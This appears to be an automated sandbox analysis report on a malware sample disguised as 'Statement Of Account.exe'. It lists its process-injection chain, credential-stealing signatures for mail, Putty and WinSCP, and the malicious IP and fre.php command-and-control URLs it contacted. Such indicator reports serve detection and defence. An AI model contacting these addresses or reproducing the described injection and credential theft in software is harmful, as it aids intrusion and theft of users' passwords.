behaviorgraph top1 signatures2 2 Behavior Graph ID: 1543094 Sample: Statement Of Account.exe Startdate: 27/10/2024 Architecture: WINDOWS Score: 100 36 Multi AV Scanner detection for domain / URL 2->36 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 9 other signatures 2->42 10 Statement Of Account.exe 1 2->10         started        process3 process4 12 Statement Of Account.exe 10->12         started        14 svchost.exe 10->14         started        signatures5 17 Statement Of Account.exe 12->17         started        19 svchost.exe 12->19         started        48 Tries to steal Mail credentials (via file registry) 14->48 process6 process7 21 Statement Of Account.exe 17->21         started        23 svchost.exe 17->23         started        process8 25 Statement Of Account.exe 21->25         started        28 svchost.exe 21->28         started        signatures9 44 Writes to foreign memory regions 25->44 46 Maps a DLL or memory area into another process 25->46 30 svchost.exe 165 25->30         started        process10 dnsIp11 34 94.156.177.220, 49704, 49705, 49706 NET1-ASBG Bulgaria 30->34 50 System process connects to network (likely due to code injection or exploit) 30->50 52 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 30->52 54 Tries to steal Mail credentials (via file / registry access) 30->54 56 2 other signatures 30->56 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
94.156.177.220
 unknown Bulgaria
43561 NET1-ASBG true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://94.156.177.220/skipo/five/fre.php true
    		unknown
    94.156.177.220/skipo/five/fre.php true unknown
    http://kbfvzoboss.bid/alien/fre.php true unknown
    http://alphastand.win/alien/fre.php true unknown
    http://alphastand.trade/alien/fre.php true unknown
    http://alphastand.top/alien/fre.php true
      		unknown